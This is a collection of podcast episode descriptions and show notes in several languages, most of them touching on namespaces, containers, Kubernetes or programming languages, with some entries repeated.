Sponsors Sentry use code “devchat” for 2 months free Triplebyte $1000 signing bonus Redisgreen Cachefly Panel Andrew Mason Nate Hopkins Eric Berry David Kumira Joined by Special Guest: Kurtis Rainbolt-Greene Episode Summary Kurtis has been working with Ruby and open source for 12 years. These days he works on maintaining large libraries like VCR. He talks about what VCR is, why it’s useful, and some of its limitations. The real topic of today’s show is Kubernetes. Kubernetes is an open-source container orchestration system for automating application deployment, scaling, and management. Kurtis describes what it is and some of the features it has. The panel discuss about some of the limitations of Kubernetes, and where it really shines in the development lifecycle. Kurtis advises Kubernete users to leave their databases as an outside source and not put them in Kubernetes, as well as other things to avoid. They talk about methods for encrypting information within Kubernetes.The panel discusses how Kubernetes compares to other services and some of the unique features. The panel discusses what it’s like to learn Kubernetes. Kurtis advises listeners who are learning Kubernetes to consult with other people who are experienced with. Kubernetes has some different terms for functions that can be confusing to newcomers. It can take between 3 and 6 complete weekends to become comfortable using Kubernetes. Kurtis shares how to transfer a Rails app into Kubernetes. To get started with Kubernetes on the cheap, find a computer with a decent amount of ram,install Ubuntu and MicroK8s for a perfect tinkering playground. Links Sinatra VCR API pod/container Loki by Grafana Stateless services Namespaces Chef Puppet Dockerfiles Heroku PG Bouncer Hephy Workflow Gitlab Auto DevOps Helm Ubuntu MicroK8s Azure Cloud66 Config maps Ingress Prometheus CD/CI Hashi Follow DevChat on Facebook and Twitter Picks Nate Hopkins: Heroku How To Be Like Walt book Real Genius film Andrew Mason: Peacock VSCode extension Drifting Ruby ep. 181- Intro to Kubernetes David Kimura: Microk8s.io and ‘Microk8s.reset’ command Kubernetes Slack channel Kurtis Rainbolt-Greene: Satisfactory game Kubernetes on Rails video series
Sponsors Sentry use code “devchat” for 2 months free Triplebyte $1000 signing bonus Redisgreen Cachefly Panel Andrew Mason Nate Hopkins Eric Berry David Kumira Joined by Special Guest: Kurtis Rainbolt-Greene Episode Summary Kurtis has been working with Ruby and open source for 12 years. These days he works on maintaining large libraries like VCR. He talks about what VCR is, why it’s useful, and some of its limitations. The real topic of today’s show is Kubernetes. Kubernetes is an open-source container orchestration system for automating application deployment, scaling, and management. Kurtis describes what it is and some of the features it has. The panel discuss about some of the limitations of Kubernetes, and where it really shines in the development lifecycle. Kurtis advises Kubernete users to leave their databases as an outside source and not put them in Kubernetes, as well as other things to avoid. They talk about methods for encrypting information within Kubernetes.The panel discusses how Kubernetes compares to other services and some of the unique features. The panel discusses what it’s like to learn Kubernetes. Kurtis advises listeners who are learning Kubernetes to consult with other people who are experienced with. Kubernetes has some different terms for functions that can be confusing to newcomers. It can take between 3 and 6 complete weekends to become comfortable using Kubernetes. Kurtis shares how to transfer a Rails app into Kubernetes. To get started with Kubernetes on the cheap, find a computer with a decent amount of ram,install Ubuntu and MicroK8s for a perfect tinkering playground. Links Sinatra VCR API pod/container Loki by Grafana Stateless services Namespaces Chef Puppet Dockerfiles Heroku PG Bouncer Hephy Workflow Gitlab Auto DevOps Helm Ubuntu MicroK8s Azure Cloud66 Config maps Ingress Prometheus CD/CI Hashi Follow DevChat on Facebook and Twitter Picks Nate Hopkins: Heroku How To Be Like Walt book Real Genius film Andrew Mason: Peacock VSCode extension Drifting Ruby ep. 181- Intro to Kubernetes David Kimura: Microk8s.io and ‘Microk8s.reset’ command Kubernetes Slack channel Kurtis Rainbolt-Greene: Satisfactory game Kubernetes on Rails video series
CC BY-NC-SA 3.0, DigitalOcean.Sign-up for DigitalOcean ($100 credit!): do.co/42Beautiful is better than ugly.Explicit is better than implicit.Simple is better than complex.Complex is better than complicated.Flat is better than nested.Sparse is better than dense.Readability counts.Special cases aren't special enough to break the rules.Although practicality beats purity.Errors should never pass silently.Unless explicitly silenced.In the face of ambiguity, refuse the temptation to guess.There should be one-- and preferably only one --obvious way to do it.Although that way may not be obvious at first unless you're Dutch.Now is better than never.Although never is often better than *right* now.If the implementation is hard to explain, it's a bad idea.If the implementation is easy to explain, it may be a good idea.Namespaces are one honking great idea -- let's do more of those! See acast.com/privacy for privacy and opt-out information.
Mark and Melanie are joined by Sarah Novotny, Head of Open Source Strategy for Google Cloud Platform, to talk all about Open Source, the Cloud Native Compute Foundation and their relationships to Google Cloud Platform. Sarah Novotny Sarah Novotny leads an Open Source Strategy group for Google Cloud Platform. She has long been an Open Source community champion in communities such as Kubernetes, NGINX and MySQL and ran large scale technology infrastructures at Amazon before web-scale had a name. In 2001, she co-founded Blue Gecko, which was sold to DatAvail in 2012. She is a program chair emeritus for O’Reilly Media’s OSCON. Cool things of the week Now live in Tokyo: using TensorFlow to predict taxi demand blog Kubernetes best practices: Organizing with Namespaces blog youtube Announcing Open Images V4 and the ECCV 2018 Open Images Challenge blog dataset challenge Introducing Kubernetes Service Catalog and Google Cloud Platform Service Broker: find and connect services to your cloud-native apps blog docs Julia Evans - zines store Interview Kubernetes site Node.js Foundation board of directors Tensorflow site gRPC site Apache Beam site Google Kubernetes Engine site Forseti site podcast Cloud Native Compute Foundation site Cloud Native Computing Foundation Announces Kubernetes® as First Graduated Project blog NTP’s Fate Hinges On ‘Father Time’ article Open Container Initiative site Fireside chat: building on and contributing to Google’s open source projects Google I/O Question of the week Mark broke SSH access to his Compute Engine instance by accidentally removing the GCP linux guest environment. How did he fix it? Installing the Linux Guest Environment via Clone Root Disk & Use Startup Script docs Where can you find us next? Mark can be found streaming Agones development on Twitch and finished his blog series on scaling game servers on Kubernetes. Melanie will be speaking at the internet2 Global Summit, May 9th in San Diego, and will also be talking at the Understand Risk Forum on May 17th, in Mexico City.
Show Overview: Brian and Tyler discuss the basics of Microsoft Windows Containers and their integration into Kubernetes. Show Notes:Kubernetes Sig-WindowsWindows Containers (Microsoft)Getting Started with Windows Containers (CNCF)Red Hat OpenShift + Windows ContainersPodCTL Basics - Linux Containers Windows Server 2019 (preview) - KubernetesTopic 1 - Containers on WindowsHistory of Containers & WindowsHow Windows Containers differ from Linux ContainersTopic 2 - Running Windows Containers on KubernetesRequirementsLimitationsDevelopmentFeedback?Email: PodCTL at gmail dot comTwitter: @PodCTL Web: http://podctl.com
In this episode, we discuss certifications, the "Uber of Humans", Marc Benioff's interview on CNBC discussing the regulation of social media, and naming conflicts in Apex. You may soon be able to send ‘Human Ubers’ as your surrogate - BBC Three Salesforce CEO Marc Benioff says regulate Facebook like tobacco Davos 2018: A.I. machine called Einstein attends Salesforce meetings SalesForce.com vs Dynamics 365 CRM: A live Side-By-Side Comparison By BrainSell LLC On February 14th | Markets Insider
Introduction [2:18] SingaporeCSS Meetup Cookies Saas CSS in large web apps [7:31] !important rule reset css normalize css jquery CSS grid CSS floats CSS flex-box grunt gulp webpack cascade atomic css smacss BEM CSS Modules Harry Roberts CSS with Namespaces bootstrap yandex talk.css prettify nano xkcd regular expressions CSS autoprefixer caniuse kerning variable fonts serifs color fonts Rapid Fire [38:45] modem sound explaination nano rss css-tricks My First Carcassonne Civilisation React swift I/O Polling audience questions [44:47] webpack grunt gulp Picks [47:00] TED Radio Hour Meltdown and Spectre Makefile The Next Billion Seconds Genevieve Bell Event Loop - Local events [51:06] Infosec in the City Hack and Roll Talk.CSS max-content edition
Network Namespaces have been around for a while, but there may be be some very practical ways to use them that you’ve never considered. Wes does a deep dive into a very flexible tool. Plus what might be the world’s most important killswitch, the real dollar values for stolen credentials & the 19 year old attack that’s back.
Network Namespaces have been around for a while, but there may be be some very practical ways to use them that you’ve never considered. Wes does a deep dive into a very flexible tool. Plus what might be the world’s most important killswitch, the real dollar values for stolen credentials & the 19 year old attack that’s back.
Network Namespaces have been around for a while, but there may be be some very practical ways to use them that you’ve never considered. Wes does a deep dive into a very flexible tool. Plus what might be the world’s most important killswitch & more!
Network Namespaces have been around for a while, but there may be be some very practical ways to use them that you’ve never considered. Wes does a deep dive into a very flexible tool. Plus what might be the world’s most important killswitch & more!
Network Namespaces have been around for a while, but there may be be some very practical ways to use them that you’ve never considered. Wes does a deep dive into a very flexible tool. Plus what might be the world’s most important killswitch, the real dollar values for stolen credentials and the 19 year old attack that’s back.
We can't contain our excitement as we dive deep into the world of jails, zones & so-called linux containers. Dan shares his years of experience using the time-tested original bad boy of containers, FreeBSD jails. Wes breaks down cgroups, namespaces & explains how they come together to create a container. Plus we discuss similarities, differences, workflows & more! And of course your fantastic feedback, a record setting round-up & so much more!
We can't contain our excitement as we dive deep into the world of jails, zones & so-called linux containers. Dan shares his years of experience using the time-tested original bad boy of containers, FreeBSD jails. Wes breaks down cgroups, namespaces & explains how they come together to create a container. Plus we discuss similarities, differences, workflows & more! And of course your fantastic feedback, a record setting round-up & so much more!
We can't contain our excitement as we dive deep into the world of jails, zones & so-called linux containers. Dan shares his years of experience using the time-tested original bad boy of containers, FreeBSD jails. Wes breaks down cgroups, namespaces & explains how they come together to create a container. Plus we discuss similarities, differences, workflows & more! And of course your fantastic feedback, a record setting round-up & so much more!
Show: 14Show Overview: Brian and Tyler talk address some of the many layers of security required in a container environment. This show will be part of a series on container and Kubernetes security. They look at security requirement in the Container Host, Container Content, Container Registry, and Software Build Processes. Show Notes and News:10 Layers of Container SecurityGoogle, VMware and Pivotal announced a Hybrid Cloud partnership with KubernetesGoogle and Cisco announced a Hybrid Cloud partnership with Kubernetes (and more)Docker adds support for Kubernetes to DockerEERancher makes Kubernetes the primary orchestratorMicrosoft announces new Azure Container Service, AKSOracle announced Kubernetes on Oracle Linux (and some installers)Heptio announces new toolsTopic 1 - Let’s start at the bottom of the stack with the security needed on a container host.Linux namespaces - isolation Linux capabilities and SECCOMP - restrict routes, ports, limiting process calls SELinux (or AppArmor) - mandatory access controls cGroups - resource managementTopic 2 - Next in the stack, or outside the stack, is the sources of container content.Trusted sources (known registries vs. public registries (e.g. DockerHub) Scanning the content of containers Managing the versions, patches of container contentTopic 3 - Once we have the content (applications), we need a secure place to store and access it - container registries.Making a registry highly-available Who manages and audits the registry? How to scan container within a container? How to cryptographically sign images? Identifying known registries Process for managing the content in a registry (tagging, versioning/naming, etc) Automated policies (patch management, getting new content, etc.) Topic 4 - Once we have secure content (building blocks) and a secure place to store the container images, we need to think about a secure supply chain of the software - the build process.Does a platform require containers, or can it accept code? Can it manage secure builds? How to build automated triggers for builds? How to audit those triggers (webhooks, etc.)? How to validate / scan / test code at different stages of a pipeline? (static analysis, dynamic analysis, etc.) How to promote images to a platform? (automated, manual promotion, etc.)Feedback?Email: PodCTL at gmail dot comTwitter: @PodCTL Web: http://podctl.com
Show Overview: Brian and Tyler discuss the basics of Linux containers. Show Notes:[TRANSCRIPTION] PodCTL Basics - Linux ContainersAn Introduction to Container TerminologyArchitecting Containers: User Space vs. Kernel Space Segment 1 - What is a Linux Container?Filesystem + Metadata (JSON) Segment 2 - How do Linux hosts interact (and isolate) Linux Containers?Host OS vs. Container OSContainer isolation Container security 101Segment 3 - How does a container interact with Networking and Storage?Pass-thru host detailsCNI - Container Native InterfaceNative container networkingStorage Volumes (static & dynamic)Segment 4 - Can any Application run in a Linux Container? Does it have to be modified?User namespace vs rootResource requirements Feedback?Email: PodCTL at gmail dot comTwitter: @PodCTL Web: http://podctl..com
We get to work understanding the world of PHP, that scripting language that runs the vast majority of the internet. Is it more than just Wordpress? Join us as we find out! Kevin & Len are joined by Etienne Marais, a senior PHP developer at Superbalist. Before moving to Cape Town, we met Etienne at the Johannesburg Laravel User meetup that he was organizing. Etienne points us to the TIOBE index, Netcraft's survey and Venturebeat's analysis of popular languages on GitHub, consistently showing PHP as one of the most popular languages in use on the internet today. Etienne has been using PHP for nearly a decade and helps our panelists get up to speed with how PHP has evolved and matured. Follow Etienne online: - https://twitter.com/etbal - https://github.com/etiennemarais - https://medium.com/@etbal Here are some resources mentioned during the show: * PHP website - http://php.net * TIOBE Index - http://www.tiobe.com/tiobe_index * Top 10 languages on GitHub according to Venturebeat - http://venturebeat.com/2015/08/19/here-are-the-top-10-programming-languages-used-on-github/ * PHP Usage based on Netcraft survey - http://php.net/usage.php * LAMP Stack - https://en.wikipedia.org/wiki/LAMP_(software_bundle) * PHP 6 or PHP 7 - https://philsturgeon.uk/php/2014/07/23/neverending-muppet-debate-of-php-6-v-php-7/ * HHVM - http://hhvm.com/ * Hack - http://hacklang.org/ * Laravel - https://laravel.com/ * Docker - https://www.docker.com * Vagrant - https://vagrantup.com/ * PEAR (Legacy package management) - http://pear.php.net/ * Composer dependency manager - https://getcomposer.org/ * https://philsturgeon.uk/php/2012/03/06/packages-the-way-forward-for-php/ * Namespaces in PHP - http://php.net/manual/en/language.namespaces.php * Travis & PHP - https://docs.travis-ci.com/user/languages/php * MVC Framework - https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93controller * TWIG templates - http://twig.sensiolabs.org/ * Blade templates - https://laravel.com/docs/5.1/blade * Smarty Template Engine - http://www.smarty.net/ * Zend Framework - http://framework.zend.com/ * Code Igniter Framework - https://www.codeigniter.com/ * Symfony Framework - https://symfony.com/ * PHP The Right Way - http://www.phptherightway.com/ * Eloquent Models (Laravel) - https://laravel.com/docs/5.1/eloquent * Doctrine Models (Symfony) - http://symfony.com/doc/current/book/doctrine.html * Angular - https://angularjs.org/ * React - https://facebook.github.io/react/ * Phing - https://www.phing.info/ * Packer - https://www.packer.io/intro/ * Ansible - https://www.ansible.com/ * Joburg PHP Meetup - http://www.meetup.com/PHP-Johannesburg-Meetup-Group/ * PHP SA 2016 Conference - http://phpsouthafrica.com/ And finally our picks Etienne: - Build something with Laravel & Composer - Lumen - https://lumen.laravel.com/ - Laracasts - https://laracasts.com/ - Terraform by Hashicorp - https://www.terraform.io/ Kevin: - Kubernetes - http://kubernetes.io/ Len: - Semantic UI - http://semantic-ui.com/ Thanks for listening! Stay in touch: * Socialize - https://twitter.com/zadevchat & http://facebook.com/ZADevChat/ * Suggestions and feedback - https://github.com/zadevchat/ping * Subscribe and rate in iTunes - https://itunes.apple.com/za/podcast/zadevchat-podcast/id1057372777
Aaron and Brian talk to John Willis (@botchagulpe; VP of Customer Enablement @Docker) and Madhu Venugopal (@MadhuVenugopal, Sr.Director Networking @Docker) about the evolution from Socketplane to Docker Networking, the new plugin architecture in v1.7, who is the new Networking admin/ops and how to learn the container networking model. Interested in the O'Reilly OSCON? Want a chance at a free pass for OSCON? Send us your interesting journey in Open Source to show@thecloudcast.net by Friday July 10th and we'll pick a winner! Want to register for OSCON now? Use promo code 20CLOUD for 20% off Check out the OSCON Schedule Free eBook from O'Reilly Media for Cloudcast Listeners! Check out an excerpt from the upcoming Docker Cookbook Links from the show: Docker Tutorials (video) DevOps Cafe (podcast) Docker Networking (updates in v1.7) Thanks for the Docker folks for having us! - DockerCon 2015 on YouTube Topic 1 - We spoke with you just a few months ago, when you were working with Socketplane. What happened to those guys? Topic 2 - Docker Networking has evolved into this concept/library called “libnetwork”. Help us understand the basic concepts of networking for Docker containers. Topic 3 - We sat through the Docker Networking tutorial yesterday. As old-timey networking guys, a lot of the terminology was very different - Sandbox, Endpoint, Network, Namespaces. What’s a good learning resource to help us connect the dots between the old and the new? Topic 4 - Let’s talk about the new plugin architecture for Docker. This extends to many area, including Networking and Storage. What does this mean for a networking partner that can to plugin to Docker? Topic 5 - Can you talk about the interactions between Docker Networking and of the Service Discovery frameworks (eg. etcd, Swarm, Consul, etc.)? Topic 6 - We’ve heard that the container framework is essentially - Developers own inside the containers; Ops own outside the containers. Does that still hold true for how Docker Networking works?
Welcome to episode 162 of Independent Misinterpretations - a Smalltalk and dynamic language oriented podcast with James Robertson and David Buck. This week James and David talk about namespaces in Smalltalk (specifically in Cincom Smalltalk, as that's the only formal implementation in Smalltalk to date). You can subscribe to the podcast in iTunes (or any other podcatching software) using this feed directly or in iTunes with this one. To listen now, you can either download the mp3 edition, or the AAC edition. The AAC edition comes with chapter markers. You can subscribe to either edition of the podcast directly in iTunes; just search for Smalltalk and look in the Podcast results. You can subscribe to the mp3 edition directly using this feed, or the AAC edition using this feed using any podcatching software. You can also download the podcast in ogg format. If you like the music we use, please visit Josh Woodward's site. We use the song Troublemaker for our intro/outro music. I'm sure he'd appreciate your support! If you have feedback, send it to jarober@gmail.com - or visit us on Facebook - you can subscribe in iTunes using this iTunes enabled feed.. If you enjoy the podcast, pass the word - we would love to have more people hear about Smalltalk! Tags: smalltalk, namespaces
Aaron and Brian speak with Brandon Philips (@brandonphilips), CTO for CoreOS on the concept of a new purpose built operating system for massive scale out applications. We also talk about the conept of booting without a kernel and why Namespaces, Containers and Cgroups are more important in this configuration. Music credit: Nine Inch Nails (nin.com)
Dll Hell musical arrangement by Reddit user arilotter.http://www.reddit.com/user/arilotterLyrics:My references are missing, Though some seem to be doubled. Spent lots of time compiling, but my builds seem to be troubled. Namespaces are hexing When you've got some code to sell. I'm damning IDEs right now. I'm stuck in dll hell. My screen is filled with red lines, Exceptions stop my code. I wish my education Had taken me down a different road. Microsoft is laughing, I'm no longer feeling well. My GAC is all poluted, and I'm stuck in dll hell. Cascading web.configs have Made me lose my sense of time. My brain is so damn tired, I'm not sure that I can... uh... make the lines sound the same. I'm disowning Visual Studio, I long for my Linux Shell. They'll never find Steve Ballmer Once I'm out of dll hell.
Wir widmen uns diesmal fast ausschließlich der f8 Ankündigungen. Ist Facebook jetzt offener? Ist die API simpler? Kommt man an mehr Infos? Wie sieht es mit offenen Standards aus? usw…Viel Spaß beim Hören: Ihr Browser unterstützt diesen Audio-Player nicht.Länge: 1h2m29s (54.7 MB), Download MP3News Google unterstützt noch mehr Microformats (hCalendar, hRecipe) und Microdata Mozilla veröffentlicht AccountManager http://mozillalabs.com/blog/2010/04/account-manager-graduates-from-labs/ http://hacks.mozilla.org/2010/04/account-manager-coming-to-firefox/ Webfinger für WordPress: http://wordpress.org/extend/plugins/webfinger/Facebooks Ankündigungenhttp://blog.facebook.com/blog.php?post=383404517130 Open Graph Protocol: http://opengraphprotocol.org Social Plugins Graph API Insights for Domains Instant Personalization Developer TOS: 24h-Limit ist weg, aber keine Nutzung in Ad-NetworksProbleme Open Graph Seltsamer Name Benutzt RDFa Viele Informationen müssen aber mehrfach eingegeben werden, z.B. title Aber vielleicht gut zur Verbreitung des Semantic Web? Mischmasch von Namespaces und nur Facebook-zentrierte Dinge?Privacy?Vor allem Instant Personalization und “Referrer” bei Like-Button. Was genau speichert Facebook.Anderes Problem: ZentralisierungGigaOM on Instant Personalization http://gigaom.com/2010/04/22/facebooks-instant-personalization-is-the-real-privacy-hairball/ Christoph Kappes auf CARTA über Zentralisierung http://carta.info/26360/facebook-ein-sonderfall-im-oekosystem-des-internets/ Chris Messina: http://factoryjoe.com/blog/2010/04/22/understanding-the-open-graph-protocol/ But, here’s the rub: rather than using data that’s already on the web, everyone that wants to play Facebook’s game needs to go and retrofit their pages to include these new metadata types. While they’re busy with that (it should take a few minutes at most, really), is it at all likely that they _won’t_also implement support for Facebook’s Like button? Isn’t that the motivation for supporting the Open Graph Protocol in the first place? Here’s the rub though: those Like buttons only work against Facebook. I can’t just be signed in to any social web provider… it’s got to be Facebook. And on top of that, whenever I “like” something, I’m sending a signal back to Facebook that gets recorded on both my profile, and in my activity stream.(OpenLike: http://openlike.org/)Instant Personalization opt out guide:http://librarianbyday.net/2010/04/protect-your-privacy-opt-out-of-facebooks-new-instant-personalization-yes-you-have-to-opt-out/
PHPSPCast #1: PHP5.3 – O bom, o mal e o Namespaces! Publicado em: 20/05/2009 http://phpsp.org.br
MediaWiki ist bekannt als der Maschinenraum der Wikipedia und mit ihr verwandter Projekte. Aber MediaWiki lässt sich auch unabhängig von der Wikipedia produktiv für eigene Projekte einsetzen. Trotzdem fällt es manchmal schwer, zwischen den beiden Projekten zu unterscheiden. Im Gespräch mit Tim Pritlove klärt Raimond Spekking auf, welche Eigenschaften MediaWiki auszeichnen und welche verborgenen Features zur freien Nutzung bereitstehen. Themen: die Syntax, Namespaces, Wikimedia Commons, Single Unified Login (SUL), Stabile Versionen, Benutzerrechte und administrative Funktionen, Templates, Wiki-Metadaten, Begriffsklärungsseite, Weiterleitungsseiten, Artikel verschieben, Rich Editing, mobile Version, Skins, Lokalisierung und MediaWiki Extensions.
In dieser Ausgabe von Chaosradio Express geht es in die technischen Details eines speziellen Projektes in der Welt der Programmiersprachen und Compiler: PyPy. Im Gespräch mit Tim Pritlove erörtert Holger Krekel Hintergründe zur Programmierung in Python und die Motivation zum Start des PyPy-Projektes. Zunächst widmet sich die Sendung der Programmiersprache Python selbst und erläutert verschiedene Konzepte und Konventionen der Programmierung. Hier kommen unter anderem zur Sprache: direkte Evaluation, die spezielle Syntax von Python unter Verwendung von Einrückung anstatt von Trennzeichen, der Einsatz von Regressionstest in der Programmierung, Kooperatives Programmierung in einem Projekt mit Sprints und Modulen, Namespaces, die verfügbaren Python-Interpreter und -Laufzeitumgebungen, Einsatzmöglichkeiten und Stärken von Python, populäre Bibliotheken, Projekte und Organisationen, die Python verwenden. Im zweiten Teil konzentriert sich das Gespräch auf PyPy. Hier werden erläutert: wie es zu dem Projekt kam und welche Ziele es verfolgt, wie man einem Programm dadurch analysiert, in dem man ihm zur Laufzeit dabei zuschaut, wie es ausgeführt wird, wie man daraus einen Übersetzter in beliebige Zielplattformen generiert, die automatische Erzeugung von Just-In-Compilern, die Low Level Virtual Machine (LLVM), EU-Förderung für das PyPy-Projekt und mögliche Anwendungen für PyPy in der Zukunft.
Harvard Extension School's Computer Science E-259: XML with Java, Java Servlet, and JSP
PDF format
Harvard Extension School's Computer Science E-259: XML with Java, Java Servlet, and JSP
PDF format
Harvard Extension School's Computer Science E-259: XML with Java, Java Servlet, and JSP
MP3 format
Harvard Extension School's Computer Science E-259: XML with Java, Java Servlet, and JSP
QuickTime format
En este programa hablamos sobre el uso de Namespace, adicionalmente tratamos un tema de Neurona Help que tiene que ver con recursos para entrarle con todo al desarrollo en .NET 2005 y para terminar platicamos de la reunión de la Comunidad .NET en la Ciudad de México